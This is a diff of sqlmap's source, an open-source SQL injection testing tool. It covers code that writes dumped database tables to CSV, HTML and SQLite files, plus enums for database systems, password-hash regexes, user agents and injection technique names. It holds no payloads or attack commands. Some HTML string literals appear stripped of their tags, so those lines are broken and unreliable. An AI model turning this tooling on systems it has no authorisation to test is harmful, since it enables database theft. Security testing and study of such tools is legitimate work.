logger.warning(warnMsg) + + dumpDbPath = tempDir + if conf.dumpFormat == DUMP_FORMAT.SQLITE: - replication = Replication("%s%s%s.sqlite3" % (conf.dumpPath, os.sep, unsafeSQLIdentificatorNaming(db))) + replication = Replication(os.path.join(conf.dumpPath, "%s.sqlite3" % unsafeSQLIdentificatorNaming(db))) elif conf.dumpFormat in (DUMP_FORMAT.CSV, DUMP_FORMAT.HTML): - dumpDbPath = "%s%s%s" % (conf.dumpPath, os.sep, unsafeSQLIdentificatorNaming(db)) - if not os.path.isdir(dumpDbPath): - os.makedirs(dumpDbPath, 0755) + try: + os.makedirs(dumpDbPath) + except: + warnFile = True - dumpFileName = "%s%s%s.%s" % (dumpDbPath, os.sep, unsafeSQLIdentificatorNaming(table), conf.dumpFormat.lower()) - dumpFP = openFile(dumpFileName, "wb") + _ = re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, unsafeSQLIdentificatorNaming(db)) + dumpDbPath = os.path.join(conf.dumpPath, "%s-%s" % (_, hashlib.md5(getBytes(db)).hexdigest()[:8])) + + if not os.path.isdir(dumpDbPath): + try: + os.makedirs(dumpDbPath) + except Exception as ex: + tempDir = tempfile.mkdtemp(prefix="sqlmapdb") + warnMsg = "unable to create dump directory " + warnMsg += "'%s' (%s). 
" % (dumpDbPath, getSafeExString(ex)) + warnMsg += "Using temporary directory '%s' instead" % tempDir + logger.warning(warnMsg) + + dumpDbPath = tempDir + + dumpFileName = conf.dumpFile or os.path.join(dumpDbPath, re.sub(r'[\\/]', UNSAFE_DUMP_FILEPATH_REPLACEMENT, "%s.%s" % (unsafeSQLIdentificatorNaming(table), conf.dumpFormat.lower()))) + if not checkFile(dumpFileName, False): + try: + openFile(dumpFileName, "w+").close() + except SqlmapSystemException: + raise + except: + warnFile = True + + _ = re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, normalizeUnicode(unsafeSQLIdentificatorNaming(table))) + if len(_) < len(table) or IS_WIN and table.upper() in WINDOWS_RESERVED_NAMES: + _ = re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, unsafeSQLIdentificatorNaming(table)) + dumpFileName = os.path.join(dumpDbPath, "%s-%s.%s" % (_, hashlib.md5(getBytes(table)).hexdigest()[:8], conf.dumpFormat.lower())) + else: + dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (_, conf.dumpFormat.lower())) + else: + appendToFile = any((conf.limitStart, conf.limitStop)) + + if not appendToFile: + count = 1 + while True: + candidate = "%s.%d" % (dumpFileName, count) + if not checkFile(candidate, False): + try: + shutil.copyfile(dumpFileName, candidate) + except IOError: + pass + break + else: + count += 1 + + dumpFP = openFile(dumpFileName, 'w' if not appendToFile else 'a', buffering=DUMP_FILE_BUFFER_SIZE) count = int(tableValues["__infos__"]["count"]) + if count > TRIM_STDOUT_DUMP_SIZE: + warnMsg = "console output will be trimmed to " + warnMsg += "last %d rows due to " % TRIM_STDOUT_DUMP_SIZE + warnMsg += "large table size" + logger.warning(warnMsg) + separator = str() field = 1 fields = len(tableValues) - 1 - columns = prioritySortColumns(tableValues.keys()) + columns = prioritySortColumns(list(tableValues.keys())) + + if conf.col: + cols = conf.col.split(',') + columns = sorted(columns, key=lambda _: cols.index(_) if _ in cols else 0) for column in columns: if column != "__infos__": @@ -381,7 +507,7 @@ def dbTableValues(self, tableValues, content_type=API_CONTENT_TYPE.DUMP_TABLE): separator += "+%s" % lines separator += "+" - self._write("Database: %s\nTable: %s" % (db if db else "Current database", table)) + self._write("Database: %s\nTable: %s" % (unsafeSQLIdentificatorNaming(db) if db and METADB_SUFFIX not in db else "", unsafeSQLIdentificatorNaming(table))) if conf.dumpFormat == DUMP_FORMAT.SQLITE: cols = [] @@ -390,7 +516,8 @@ def dbTableValues(self, tableValues, content_type=API_CONTENT_TYPE.DUMP_TABLE): if column != "__infos__": colType = Replication.INTEGER - for value in tableValues[column]['values']: + for i in xrange(min(CHECK_SQLITE_TYPE_THRESHOLD, len(tableValues[column]['values']))): + value = tableValues[column]['values'][i] try: if not value or value == " ": # NULL continue @@ -403,7 +530,8 @@ def dbTableValues(self, tableValues, content_type=API_CONTENT_TYPE.DUMP_TABLE): if colType is None: colType = Replication.REAL - for value in tableValues[column]['values']: + for i in xrange(min(CHECK_SQLITE_TYPE_THRESHOLD, len(tableValues[column]['values']))): + value = tableValues[column]['values'][i] try: if not value or value == " ": # NULL continue @@ -413,12 +541,16 @@ def dbTableValues(self, tableValues, content_type=API_CONTENT_TYPE.DUMP_TABLE): colType = None break - cols.append((column, colType if colType else Replication.TEXT)) + cols.append((unsafeSQLIdentificatorNaming(column), colType if colType else Replication.TEXT)) rtable = replication.createTable(table, cols) elif conf.dumpFormat 
== DUMP_FORMAT.HTML: - documentNode = getDOMImplementation().createDocument(None, "table", None) - tableNode = documentNode.documentElement + dataToDumpFile(dumpFP, "\n\n\n") + dataToDumpFile(dumpFP, "\n" % UNICODE_ENCODING) + dataToDumpFile(dumpFP, "\n" % VERSION_STRING) + dataToDumpFile(dumpFP, "%s\n" % ("%s%s" % ("%s." % db if METADB_SUFFIX not in db else "", table))) + dataToDumpFile(dumpFP, HTML_DUMP_CSS_STYLE) + dataToDumpFile(dumpFP, "\n\n\n\n\n\n") if count == 1: self._write("[1 entry]") @@ -427,56 +559,48 @@ def dbTableValues(self, tableValues, content_type=API_CONTENT_TYPE.DUMP_TABLE): self._write(separator) - if conf.dumpFormat == DUMP_FORMAT.HTML: - headNode = documentNode.createElement("thead") - rowNode = documentNode.createElement("tr") - tableNode.appendChild(headNode) - headNode.appendChild(rowNode) - bodyNode = documentNode.createElement("tbody") - tableNode.appendChild(bodyNode) - for column in columns: if column != "__infos__": info = tableValues[column] + + column = unsafeSQLIdentificatorNaming(column) maxlength = int(info["length"]) - blank = " " * (maxlength - len(column)) + blank = " " * (maxlength - getConsoleLength(column)) self._write("| %s%s" % (column, blank), newline=False) - if conf.dumpFormat == DUMP_FORMAT.CSV: - if field == fields: - dataToDumpFile(dumpFP, "%s" % safeCSValue(column)) - else: - dataToDumpFile(dumpFP, "%s%s" % (safeCSValue(column), conf.csvDel)) - elif conf.dumpFormat == DUMP_FORMAT.HTML: - entryNode = documentNode.createElement("td") - rowNode.appendChild(entryNode) - entryNode.appendChild(documentNode.createTextNode(column)) + if not appendToFile: + if conf.dumpFormat == DUMP_FORMAT.CSV: + if field == fields: + dataToDumpFile(dumpFP, "%s" % safeCSValue(column)) + else: + dataToDumpFile(dumpFP, "%s%s" % (safeCSValue(column), conf.csvDel)) + elif conf.dumpFormat == DUMP_FORMAT.HTML: + dataToDumpFile(dumpFP, "" % (field - 1, getUnicode(htmlEscape(column).encode("ascii", "xmlcharrefreplace")))) field += 1 + if conf.dumpFormat == DUMP_FORMAT.HTML: + dataToDumpFile(dumpFP, "\n\n\n\n") + self._write("|\n%s" % separator) if conf.dumpFormat == DUMP_FORMAT.CSV: - dataToDumpFile(dumpFP, "\n") + dataToDumpFile(dumpFP, "\n" if not appendToFile else "") elif conf.dumpFormat == DUMP_FORMAT.SQLITE: rtable.beginTransaction() - if count > TRIM_STDOUT_DUMP_SIZE: - warnMsg = "console output will be trimmed to " - warnMsg += "last %d rows due to " % TRIM_STDOUT_DUMP_SIZE - warnMsg += "large table size" - logger.warning(warnMsg) - for i in xrange(count): console = (i >= count - TRIM_STDOUT_DUMP_SIZE) field = 1 values = [] + if i == 0 and count > TRIM_STDOUT_DUMP_SIZE: + self._write(" ...") + if conf.dumpFormat == DUMP_FORMAT.HTML: - rowNode = documentNode.createElement("tr") - bodyNode.appendChild(rowNode) + dataToDumpFile(dumpFP, "") for column in columns: if column != "__infos__": @@ -491,21 +615,31 @@ def dbTableValues(self, tableValues, content_type=API_CONTENT_TYPE.DUMP_TABLE): value = getUnicode(info["values"][i]) value = DUMP_REPLACEMENTS.get(value, value) - values.append(value) + if conf.dumpFormat == DUMP_FORMAT.SQLITE: + values.append(value) + maxlength = int(info["length"]) - blank = " " * (maxlength - len(value)) + blank = " " * (maxlength - getConsoleLength(value)) self._write("| %s%s" % (value, blank), newline=False, console=console) if len(value) > MIN_BINARY_DISK_DUMP_SIZE and r'\x' in value: - mimetype = magic.from_buffer(value, mime=True) - if any(mimetype.startswith(_) for _ in ("application", "image")): - filepath = os.path.join(dumpDbPath, 
"%s-%d.bin" % (column, randomInt(8))) - warnMsg = "writing binary ('%s') content to file '%s' " % (mimetype, filepath) - logger.warn(warnMsg) + try: + mimetype = getText(magic.from_buffer(value, mime=True)) + if any(mimetype.startswith(_) for _ in ("application", "image")): + if not os.path.isdir(dumpDbPath): + os.makedirs(dumpDbPath) + + _ = re.sub(r"[^\w]", UNSAFE_DUMP_FILEPATH_REPLACEMENT, normalizeUnicode(unsafeSQLIdentificatorNaming(column))) + filepath = os.path.join(dumpDbPath, "%s-%d.bin" % (_, randomInt(8))) + warnMsg = "writing binary ('%s') content to file '%s' " % (mimetype, filepath) + logger.warning(warnMsg) - with open(filepath, "wb") as f: - _ = safechardecode(value, True) - f.write(_) + with openFile(filepath, "w+b", None) as f: + _ = safechardecode(value, True) + f.write(_) + + except Exception as ex: + logger.debug(getSafeExString(ex)) if conf.dumpFormat == DUMP_FORMAT.CSV: if field == fields: @@ -513,9 +647,7 @@ def dbTableValues(self, tableValues, content_type=API_CONTENT_TYPE.DUMP_TABLE): else: dataToDumpFile(dumpFP, "%s%s" % (safeCSValue(value), conf.csvDel)) elif conf.dumpFormat == DUMP_FORMAT.HTML: - entryNode = documentNode.createElement("td") - rowNode.appendChild(entryNode) - entryNode.appendChild(documentNode.createTextNode(value)) + dataToDumpFile(dumpFP, "" % getUnicode(htmlEscape(value).encode("ascii", "xmlcharrefreplace"))) field += 1 @@ -526,6 +658,8 @@ def dbTableValues(self, tableValues, content_type=API_CONTENT_TYPE.DUMP_TABLE): pass elif conf.dumpFormat == DUMP_FORMAT.CSV: dataToDumpFile(dumpFP, "\n") + elif conf.dumpFormat == DUMP_FORMAT.HTML: + dataToDumpFile(dumpFP, "\n") self._write("|", console=console) @@ -533,60 +667,62 @@ def dbTableValues(self, tableValues, content_type=API_CONTENT_TYPE.DUMP_TABLE): if conf.dumpFormat == DUMP_FORMAT.SQLITE: rtable.endTransaction() - logger.info("table '%s.%s' dumped to sqlite3 database '%s'" % (db, table, replication.dbpath)) + logger.info("table '%s.%s' dumped to SQLITE database '%s'" % (db, table, replication.dbpath)) elif conf.dumpFormat in (DUMP_FORMAT.CSV, DUMP_FORMAT.HTML): if conf.dumpFormat == DUMP_FORMAT.HTML: - dataToDumpFile(dumpFP, "\n\n\n") - dataToDumpFile(dumpFP, "\n" % UNICODE_ENCODING) - dataToDumpFile(dumpFP, "%s\n" % ("%s%s" % ("%s." % db if METADB_SUFFIX not in db else "", table))) - dataToDumpFile(dumpFP, HTML_DUMP_CSS_STYLE) - dataToDumpFile(dumpFP, "\n\n") - dataToDumpFile(dumpFP, tableNode.toxml()) - dataToDumpFile(dumpFP, "\n") + dataToDumpFile(dumpFP, "\n
%s
%s
\n\n\n") else: dataToDumpFile(dumpFP, "\n") dumpFP.close() - logger.info("table '%s.%s' dumped to %s file '%s'" % (db, table, conf.dumpFormat, dumpFileName)) - def dbColumns(self, dbColumnsDict, colConsider, dbs, content_type=API_CONTENT_TYPE.COLUMNS): - for column in dbColumnsDict.keys(): - if colConsider == "1": - colConsiderStr = "s like '" + column + "' were" + msg = "table '%s.%s' dumped to %s file '%s'" % (db, table, conf.dumpFormat, dumpFileName) + if not warnFile: + logger.info(msg) else: - colConsiderStr = " '%s' was" % column + logger.warning(msg) - msg = "Column%s found in the " % colConsiderStr - msg += "following databases:" - self._write(msg) + def dbColumns(self, dbColumnsDict, colConsider, dbs): + if conf.api: + self._write(dbColumnsDict, content_type=CONTENT_TYPE.COLUMNS) - _ = {} + for column in dbColumnsDict.keys(): + if colConsider == "1": + colConsiderStr = "s LIKE '%s' were" % unsafeSQLIdentificatorNaming(column) + else: + colConsiderStr = " '%s' was" % unsafeSQLIdentificatorNaming(column) + found = {} for db, tblData in dbs.items(): for tbl, colData in tblData.items(): for col, dataType in colData.items(): if column.lower() in col.lower(): - if db in _: - if tbl in _[db]: - _[db][tbl][col] = dataType + if db in found: + if tbl in found[db]: + found[db][tbl][col] = dataType else: - _[db][tbl] = {col: dataType} + found[db][tbl] = {col: dataType} else: - _[db] = {} - _[db][tbl] = {col: dataType} + found[db] = {} + found[db][tbl] = {col: dataType} continue - self.dbTableColumns(_) + if found: + msg = "column%s found in the " % colConsiderStr + msg += "following databases:" + self._write(msg) + + self.dbTableColumns(found) - def query(self, query, queryRes): - self.string(query, queryRes, content_type=API_CONTENT_TYPE.SQL_QUERY) + def sqlQuery(self, query, queryRes): + self.string(query, queryRes, content_type=CONTENT_TYPE.SQL_QUERY) def rFile(self, fileData): - self.lister("files saved to", fileData, sort=False, content_type=API_CONTENT_TYPE.FILE_READ) + self.lister("files saved to", fileData, sort=False, content_type=CONTENT_TYPE.FILE_READ) - def registerValue(self): - self.string("Registry key value data", registerData, registerData, content_type=API_CONTENT_TYPE.REG_READ, sort=False) + def registerValue(self, registerData): + self.string("Registry key value data", registerData, content_type=CONTENT_TYPE.REG_READ, sort=False) # object to manage how to print the retrieved queries output to # standard output and sessions file diff --git a/lib/core/enums.py b/lib/core/enums.py index d05c053470c..689055a3c21 100644 --- a/lib/core/enums.py +++ b/lib/core/enums.py @@ -1,11 +1,11 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -class PRIORITY: +class PRIORITY(object): LOWEST = -100 LOWER = -50 LOW = -10 @@ -14,7 +14,7 @@ class PRIORITY: HIGHER = 50 HIGHEST = 100 -class SORT_ORDER: +class SORT_ORDER(object): FIRST = 0 SECOND = 1 THIRD = 2 @@ -22,7 +22,16 @@ class SORT_ORDER: FIFTH = 4 LAST = 100 -class DBMS: +# Reference: https://docs.python.org/2/library/logging.html#logging-levels +class LOGGING_LEVELS(object): + NOTSET = 0 + DEBUG = 10 + INFO = 20 + WARNING = 30 + ERROR = 40 + CRITICAL = 50 + +class DBMS(object): ACCESS = "Microsoft Access" DB2 = "IBM DB2" FIREBIRD = "Firebird" @@ -33,8 +42,27 @@ class DBMS: PGSQL = "PostgreSQL" SQLITE = "SQLite" SYBASE = "Sybase" - 
-class DBMS_DIRECTORY_NAME: + INFORMIX = "Informix" + HSQLDB = "HSQLDB" + H2 = "H2" + MONETDB = "MonetDB" + DERBY = "Apache Derby" + VERTICA = "Vertica" + MCKOI = "Mckoi" + PRESTO = "Presto" + ALTIBASE = "Altibase" + MIMERSQL = "MimerSQL" + CLICKHOUSE = "ClickHouse" + CRATEDB = "CrateDB" + CUBRID = "Cubrid" + CACHE = "InterSystems Cache" + EXTREMEDB = "eXtremeDB" + FRONTBASE = "FrontBase" + RAIMA = "Raima Database Manager" + VIRTUOSO = "Virtuoso" + SNOWFLAKE = "Snowflake" + +class DBMS_DIRECTORY_NAME(object): ACCESS = "access" DB2 = "db2" FIREBIRD = "firebird" @@ -45,17 +73,56 @@ class DBMS_DIRECTORY_NAME: PGSQL = "postgresql" SQLITE = "sqlite" SYBASE = "sybase" - -class CUSTOM_LOGGING: + HSQLDB = "hsqldb" + H2 = "h2" + INFORMIX = "informix" + MONETDB = "monetdb" + DERBY = "derby" + VERTICA = "vertica" + MCKOI = "mckoi" + PRESTO = "presto" + ALTIBASE = "altibase" + MIMERSQL = "mimersql" + CLICKHOUSE = "clickhouse" + CRATEDB = "cratedb" + CUBRID = "cubrid" + CACHE = "cache" + EXTREMEDB = "extremedb" + FRONTBASE = "frontbase" + RAIMA = "raima" + VIRTUOSO = "virtuoso" + SNOWFLAKE = "snowflake" + +class FORK(object): + MARIADB = "MariaDB" + MEMSQL = "MemSQL" + PERCONA = "Percona" + COCKROACHDB = "CockroachDB" + TIDB = "TiDB" + REDSHIFT = "Amazon Redshift" + GREENPLUM = "Greenplum" + DRIZZLE = "Drizzle" + IGNITE = "Apache Ignite" + AURORA = "Aurora" + ENTERPRISEDB = "EnterpriseDB" + YELLOWBRICK = "Yellowbrick" + IRIS = "Iris" + YUGABYTEDB = "YugabyteDB" + OPENGAUSS = "OpenGauss" + DM8 = "DM8" + DORIS = "Doris" + STARROCKS = "StarRocks" + +class CUSTOM_LOGGING(object): PAYLOAD = 9 TRAFFIC_OUT = 8 TRAFFIC_IN = 7 -class OS: +class OS(object): LINUX = "Linux" WINDOWS = "Windows" -class PLACE: +class PLACE(object): GET = "GET" POST = "POST" URI = "URI" @@ -66,71 +133,111 @@ class PLACE: CUSTOM_POST = "(custom) POST" CUSTOM_HEADER = "(custom) HEADER" -class POST_HINT: +class POST_HINT(object): SOAP = "SOAP" JSON = "JSON" + JSON_LIKE = "JSON-like" MULTIPART = "MULTIPART" XML = "XML (generic)" + ARRAY_LIKE = "Array-like" -class HTTPMETHOD: +class HTTPMETHOD(object): GET = "GET" POST = "POST" HEAD = "HEAD" - -class NULLCONNECTION: + PUT = "PUT" + DELETE = "DELETE" + TRACE = "TRACE" + OPTIONS = "OPTIONS" + CONNECT = "CONNECT" + PATCH = "PATCH" + +class NULLCONNECTION(object): HEAD = "HEAD" RANGE = "Range" + SKIP_READ = "skip-read" -class REFLECTIVE_COUNTER: +class REFLECTIVE_COUNTER(object): MISS = "MISS" HIT = "HIT" -class CHARSET_TYPE: +class CHARSET_TYPE(object): BINARY = 1 DIGITS = 2 HEXADECIMAL = 3 ALPHA = 4 ALPHANUM = 5 -class HEURISTIC_TEST: +class HEURISTIC_TEST(object): CASTED = 1 NEGATIVE = 2 POSITIVE = 3 -class HASH: +class HASH(object): MYSQL = r'(?i)\A\*[0-9a-f]{40}\Z' MYSQL_OLD = r'(?i)\A(?![0-9]+\Z)[0-9a-f]{16}\Z' POSTGRES = r'(?i)\Amd5[0-9a-f]{32}\Z' MSSQL = r'(?i)\A0x0100[0-9a-f]{8}[0-9a-f]{40}\Z' MSSQL_OLD = r'(?i)\A0x0100[0-9a-f]{8}[0-9a-f]{80}\Z' + MSSQL_NEW = r'(?i)\A0x0200[0-9a-f]{8}[0-9a-f]{128}\Z' ORACLE = r'(?i)\As:[0-9a-f]{60}\Z' - ORACLE_OLD = r'(?i)\A[01-9a-f]{16}\Z' - MD5_GENERIC = r'(?i)\A[0-9a-f]{32}\Z' - SHA1_GENERIC = r'(?i)\A[0-9a-f]{40}\Z' - CRYPT_GENERIC = r'(?i)\A(?!\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\Z)(?![0-9]+\Z)[./0-9A-Za-z]{13}\Z' - WORDPRESS = r'(?i)\A\$P\$[./0-9A-Za-z]{31}\Z' - -# Reference: http://www.zytrax.com/tech/web/mobile_ids.html -class MOBILES: - BLACKBERRY = ("BlackBerry 9900", "Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+") - GALAXY = ("Samsung Galaxy S", "Mozilla/5.0 
(Linux; U; Android 2.2; en-US; SGH-T959D Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1") + ORACLE_OLD = r'(?i)\A[0-9a-f]{16}\Z' + MD5_GENERIC = r'(?i)\A(0x)?[0-9a-f]{32}\Z' + SHA1_GENERIC = r'(?i)\A(0x)?[0-9a-f]{40}\Z' + SHA224_GENERIC = r'(?i)\A[0-9a-f]{56}\Z' + SHA256_GENERIC = r'(?i)\A(0x)?[0-9a-f]{64}\Z' + SHA384_GENERIC = r'(?i)\A[0-9a-f]{96}\Z' + SHA512_GENERIC = r'(?i)\A(0x)?[0-9a-f]{128}\Z' + CRYPT_GENERIC = r'\A(?!\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\Z)(?![0-9]+\Z)[./0-9A-Za-z]{13}\Z' + JOOMLA = r'\A[0-9a-f]{32}:\w{32}\Z' + PHPASS = r'\A\$[PHQS]\$[./0-9a-zA-Z]{31}\Z' + APACHE_MD5_CRYPT = r'\A\$apr1\$.{1,8}\$[./a-zA-Z0-9]+\Z' + UNIX_MD5_CRYPT = r'\A\$1\$.{1,8}\$[./a-zA-Z0-9]+\Z' + APACHE_SHA1 = r'\A\{SHA\}[a-zA-Z0-9+/]+={0,2}\Z' + VBULLETIN = r'\A[0-9a-fA-F]{32}:.{30}\Z' + VBULLETIN_OLD = r'\A[0-9a-fA-F]{32}:.{3}\Z' + OSCOMMERCE_OLD = r'\A[0-9a-fA-F]{32}:.{2}\Z' + SSHA = r'\A\{SSHA\}[a-zA-Z0-9+/]+={0,2}\Z' + SSHA256 = r'\A\{SSHA256\}[a-zA-Z0-9+/]+={0,2}\Z' + SSHA512 = r'\A\{SSHA512\}[a-zA-Z0-9+/]+={0,2}\Z' + DJANGO_MD5 = r'\Amd5\$[^$]*\$[0-9a-f]{32}\Z' + DJANGO_SHA1 = r'\Asha1\$[^$]*\$[0-9a-f]{40}\Z' + MD5_BASE64 = r'\A[a-zA-Z0-9+/]{22}==\Z' + SHA1_BASE64 = r'\A[a-zA-Z0-9+/]{27}=\Z' + SHA256_BASE64 = r'\A[a-zA-Z0-9+/]{43}=\Z' + SHA512_BASE64 = r'\A[a-zA-Z0-9+/]{86}==\Z' + +# Reference: https://whatmyuseragent.com/brand/ +class MOBILES(object): + BLACKBERRY = ("BlackBerry Z10", "Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.3.2205 Mobile Safari/537.35+") + GALAXY = ("Samsung Galaxy A54", "Mozilla/5.0 (Linux; Android 15; SM-A546B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.155 Mobile Safari/537.36 AirWatchBrowser/25.08.0.2131") HP = ("HP iPAQ 6365", "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320; HP iPAQ h6300)") - HTC = ("HTC Sensation", "Mozilla/5.0 (Linux; U; Android 4.0.3; de-ch; HTC Sensation Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30") - IPHONE = ("Apple iPhone 4s", "Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B179 Safari/7534.48.3") + HTC = ("HTC One X2", "Mozilla/5.0 (Linux; Android 14; X2-HT) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.7204.46 Mobile Safari/537.36") + HUAWEI = ("Huawei Honor 90 Pro", "Mozilla/5.0 (Linux; Android 15; REP-AN00 Build/HONORREP-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/133.0.6943.137 Mobile Safari/537.36") + IPHONE = ("Apple iPhone 15 Pro Max", "Mozilla/7.0 (iPhone; CPU iPhone OS 18_7; iPhone 15 Pro Max) AppleWebKit/533.2 (KHTML, like Gecko) CriOS/126.0.6478.35 Mobile/15E148 Safari/804.17") + LUMIA = ("Microsoft Lumia 950 XL", "Mozilla/5.0 (Windows Mobile 10; Android 10.0;Microsoft;Lumia 950XL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36 Edge/40.15254.603") NEXUS = ("Google Nexus 7", "Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Safari/535.19") NOKIA = ("Nokia N97", "Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaN97-1/10.0.012; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) WicKed/7.1.12344") + PIXEL = ("Google Pixel 9", "Mozilla/5.0 (Linux; Android 14; Pixel 9) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/24.0 Chrome/139.0.0.0 Mobile Safari/537.36") + XIAOMI = ("Xiaomi Redmi 15C", "Mozilla/5.0 (Linux; Android 15; REDMI 15C Build/AP3A.240905.015.A2) 
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.118 Mobile Safari/537.36 XiaoMi/MiuiBrowser/14.43.0-gn") -class PROXY_TYPE: +class PROXY_TYPE(object): HTTP = "HTTP" + HTTPS = "HTTPS" SOCKS4 = "SOCKS4" SOCKS5 = "SOCKS5" -class DUMP_FORMAT: +class REGISTRY_OPERATION(object): + READ = "read" + ADD = "add" + DELETE = "delete" + +class DUMP_FORMAT(object): CSV = "CSV" HTML = "HTML" SQLITE = "SQLITE" -class HTTPHEADER: +class HTTP_HEADER(object): ACCEPT = "Accept" ACCEPT_CHARSET = "Accept-Charset" ACCEPT_ENCODING = "Accept-Encoding" @@ -143,21 +250,42 @@ class HTTPHEADER: CONTENT_RANGE = "Content-Range" CONTENT_TYPE = "Content-Type" COOKIE = "Cookie" - SET_COOKIE = "Set-Cookie" + EXPIRES = "Expires" HOST = "Host" + IF_MODIFIED_SINCE = "If-Modified-Since" + IF_NONE_MATCH = "If-None-Match" + LAST_MODIFIED = "Last-Modified" + LOCATION = "Location" PRAGMA = "Pragma" PROXY_AUTHORIZATION = "Proxy-Authorization" PROXY_CONNECTION = "Proxy-Connection" RANGE = "Range" REFERER = "Referer" + REFRESH = "Refresh" # Reference: http://stackoverflow.com/a/283794 + SERVER = "Server" + SET_COOKIE = "Set-Cookie" + TRANSFER_ENCODING = "Transfer-Encoding" + URI = "URI" USER_AGENT = "User-Agent" + VIA = "Via" + X_POWERED_BY = "X-Powered-By" + X_DATA_ORIGIN = "X-Data-Origin" -class EXPECTED: +class EXPECTED(object): BOOL = "bool" INT = "int" -class HASHDB_KEYS: +class OPTION_TYPE(object): + BOOLEAN = "boolean" + INTEGER = "integer" + FLOAT = "float" + STRING = "string" + +class HASHDB_KEYS(object): DBMS = "DBMS" + DBMS_FORK = "DBMS_FORK" + CHECK_WAF_RESULT = "CHECK_WAF_RESULT" + CHECK_NULL_CONNECTION_RESULT = "CHECK_NULL_CONNECTION_RESULT" CONF_TMP_PATH = "CONF_TMP_PATH" KB_ABS_FILE_PATHS = "KB_ABS_FILE_PATHS" KB_BRUTE_COLUMNS = "KB_BRUTE_COLUMNS" @@ -165,111 +293,215 @@ class HASHDB_KEYS: KB_CHARS = "KB_CHARS" KB_DYNAMIC_MARKINGS = "KB_DYNAMIC_MARKINGS" KB_INJECTIONS = "KB_INJECTIONS" + KB_ERROR_CHUNK_LENGTH = "KB_ERROR_CHUNK_LENGTH" KB_XP_CMDSHELL_AVAILABLE = "KB_XP_CMDSHELL_AVAILABLE" OS = "OS" -class REDIRECTION: - YES = "Y" - NO = "N" +class REDIRECTION(object): + YES = 'Y' + NO = 'N' -class PAYLOAD: +class PAYLOAD(object): SQLINJECTION = { - 1: "boolean-based blind", - 2: "error-based", - 3: "UNION query", - 4: "stacked queries", - 5: "AND/OR time-based blind", - 6: "inline query", - } + 1: "boolean-based blind", + 2: "error-based", + 3: "inline query", + 4: "stacked queries", + 5: "time-based blind", + 6: "UNION query", + } PARAMETER = { - 1: "Unescaped numeric", - 2: "Single quoted string", - 3: "LIKE single quoted string", - 4: "Double quoted string", - 5: "LIKE double quoted string", - } + 1: "Unescaped numeric", + 2: "Single quoted string", + 3: "LIKE single quoted string", + 4: "Double quoted string", + 5: "LIKE double quoted string", + 6: "Identifier (e.g. 
column name)", + } RISK = { - 0: "No risk", - 1: "Low risk", - 2: "Medium risk", - 3: "High risk", - } + 0: "No risk", + 1: "Low risk", + 2: "Medium risk", + 3: "High risk", + } CLAUSE = { - 0: "Always", - 1: "WHERE", - 2: "GROUP BY", - 3: "ORDER BY", - 4: "LIMIT", - 5: "OFFSET", - 6: "TOP", - 7: "Table name", - 8: "Column name", - } - - class METHOD: + 0: "Always", + 1: "WHERE", + 2: "GROUP BY", + 3: "ORDER BY", + 4: "LIMIT", + 5: "OFFSET", + 6: "TOP", + 7: "Table name", + 8: "Column name", + 9: "Pre-WHERE (non-query)", + } + + class METHOD(object): COMPARISON = "comparison" GREP = "grep" TIME = "time" UNION = "union" - class TECHNIQUE: + class TECHNIQUE(object): BOOLEAN = 1 ERROR = 2 - UNION = 3 + QUERY = 3 STACKED = 4 TIME = 5 - QUERY = 6 + UNION = 6 - class WHERE: + class WHERE(object): ORIGINAL = 1 NEGATIVE = 2 REPLACE = 3 -class WIZARD: +class WIZARD(object): BASIC = ("getBanner", "getCurrentUser", "getCurrentDb", "isDba") - SMART = ("getBanner", "getCurrentUser", "getCurrentDb", "isDba", "getUsers", "getDbs", "getTables", "getSchema", "excludeSysDbs") + INTERMEDIATE = ("getBanner", "getCurrentUser", "getCurrentDb", "isDba", "getUsers", "getDbs", "getTables", "getSchema", "excludeSysDbs") ALL = ("getBanner", "getCurrentUser", "getCurrentDb", "isDba", "getHostname", "getUsers", "getPasswordHashes", "getPrivileges", "getRoles", "dumpAll") -class ADJUST_TIME_DELAY: +class ADJUST_TIME_DELAY(object): DISABLE = -1 NO = 0 YES = 1 -class WEB_API: +class WEB_PLATFORM(object): PHP = "php" ASP = "asp" ASPX = "aspx" JSP = "jsp" - -class API_CONTENT_TYPE: - TECHNIQUES = 0 - BANNER = 1 - CURRENT_USER = 2 - CURRENT_DB = 3 - HOSTNAME = 4 - IS_DBA = 5 - USERS = 6 - PASSWORDS = 7 - PRIVILEGES = 8 - ROLES = 9 - DBS = 10 - TABLES = 11 - COLUMNS = 12 - SCHEMA = 13 - COUNT = 14 - DUMP_TABLE = 15 - SEARCH = 16 - SQL_QUERY 